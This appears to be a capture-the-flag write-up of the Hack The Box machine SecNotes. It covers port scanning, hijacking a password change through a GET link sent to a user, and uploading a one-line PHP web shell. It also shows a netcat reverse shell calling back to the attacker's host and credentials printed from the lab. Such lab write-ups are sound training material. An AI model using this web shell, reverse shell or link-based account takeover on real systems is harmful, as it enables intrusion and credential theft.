Write-up: Hack The Box — SecNotes
Description
- Name:
SecNotes - IP:
10.10.10.97 - Author:
0xdf - Difficulty:
5/10
Discovery
nmap -sV -sC -Pn -p- -T4 --min-rate 1000 --max-retries 5 10.10.10.97
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h20m06s, deviation: 4h02m30s, median: 5s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2018-08-28T02:44:42-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-08-28 11:44:43
|_ start_date: N/AWith dirsearch we found:
- 200 —
/login.php - 200 —
/Login.php - 500 —
/auth.php - 200 —
/home.php -> /login.php - 200 —
/resister.php
Pwn
Using nullinux we didn’t found any share without credentials.
Before trying to brute-force or bypass the login with SQLi we registered a username to access the home page.
From the home page we saw that tyler is the accountable of the GDPR for secnotes.htb and we can contact him via e-mail; from the home page we can choose to:
submit_note:a POST request withtitle=asd¬ed=asd&Submit=Saveto insert a new note on your personal page; this funcionality is vulnerable to XSSchange_pass: a POST request withpassword=newpass&confirm_password=newpass&submit=submit(this request also works in GET)logout: a GET request to logout from the websitecontact: a POST request withmessage=hello&submit=Sendto send totyler@secnotes.htba message
In the contact form we can send a link and Tyler will open it (client attack).
While testing all the site functionality nikto finished the scan and we saw that the application supports: GET, POST, TRACE, HEAD and OPTIONS.
At first we focused only on crafting some payload to get a shell from the email form; but then (thank to Nauten) we tried to use the change_pass feature with GET parameters as:
curl -s -X GET http://10.10.10.97/change_pass.php?password=dodopass&confirm_password=dodopass&submit=submit
Actually the password was changed to dodopass so we passed the same link to Tyler using the contact form.
We can now login as tyler
From the home page we got a recipe, a list of years and an URL of a SMB share with username and password:
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&We can now connect the the new-site share.
Since we saw that isstart.htm is present and is the default page presented on the web server on port 8808 we uploaded a simple PHP shell:
<?php
system($_GET["cmd"]);We can now execute commands on the machine and maybe get the first flag!
Using the web shell we enumerated the users and asked for user.txt in Tyler’s Desktop folder.
To upgrade the web shell to a reverse shell we cannot use meterpreter since on this machine is active an AV (or just Windows Defender is enough to block meterpreter stages and connections) so we uploaded the portable version of Netcat using the share and then issued the command to connect back to our machine (to create a FUD EXE see the Rabbit Writeup).
http "http://10.10.10.97:8808/dodo.php?cmd=nc.exe 10.10.XX.XX 3488 -e powershell.exe
From the user Desktop folder we also saw a link to a bash PE in “C:\Windows\System32\bash.exe” but no such PE was found in that directory. The “bash.exe” should also be linked to a WLS (Windows Linux Subsystem) installed on the machine and that could be exploit/used to gain “SYSTEM/NT” privileges.
To search for a “bash.exe” executable we launched a find command in PowerShell Get-Children -Path C:\Windows -Include bash.exe -File -Recurse -ErrorAction SilentlyContinue.
After a while (a log, maybe dir /b /s bash.exeis faster) we found that “bash.exe” is located at:
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
After poking around we discovered that even if we are `root` we cannot access “Administator” folder and thus read the system flag.
So we searched, using BASH, on the classic location where to find succulent information in a Linux system and in the root home we found the “Administator” password for a SMB share in the “.bash_history” file.
Using smbclient we connected to the sare and downloaded the root flag file.
